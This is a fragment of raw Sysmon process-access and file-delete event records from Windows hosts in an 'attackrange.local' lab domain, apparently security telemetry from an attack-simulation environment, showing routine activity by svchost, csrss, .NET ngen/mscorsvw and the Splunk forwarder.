14:57:55.201{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF3-607E-9A0D-00000000BB01}1576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.186{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF3-607E-9A0D-00000000BB01}1576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.186{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF3-607E-9A0D-00000000BB01}1576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.154{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18692AB2FAD096B22AFB7824B29FF2A9,SHA256=77DD4E62C044D4904A6D7546C0E843FEA77A19DBBCEB8E401AC123952DA563DE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.139{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF3-607E-990D-00000000BB01}5148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.123{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF3-607E-990D-00000000BB01}5148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.123{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF3-607E-990D-00000000BB01}5148C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.076{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF3-607E-980D-00000000BB01}2076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.061{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF3-607E-980D-00000000BB01}2076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.061{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF3-607E-980D-00000000BB01}2076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.029{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF3-607E-970D-00000000BB01}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.998{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBF3-607E-970D-00000000BB01}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:54.998{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF3-607E-970D-00000000BB01}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000050371Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:55.978{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF817E8B4715740B15D1D2A92DF3DA77,SHA256=C165D2F5704BCDDDCC20754C23E68A939562EE53EA343A9627EAF4AD803E89A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050370Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:55.650{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2FCD847FDE32FC3C117C55ED98FE48C0,SHA256=C5CED906435A8949B4F9F0EC1F62FC0B0742FEB01775C7C948528BFF62212094,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000050369Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:55.619{85C0FFC9-EBF3-607E-EA06-00000000BB01}37882588C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050368Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:55.510{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EBF3-607E-EA06-00000000BB01}3788C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050367Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:55.510{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050366Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:55.510{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050365Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:55.510{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050364Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:55.510{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050363Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:55.510{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050362Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:55.510{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050361Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:55.510{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050360Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:55.510{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050359Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:55.510{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntd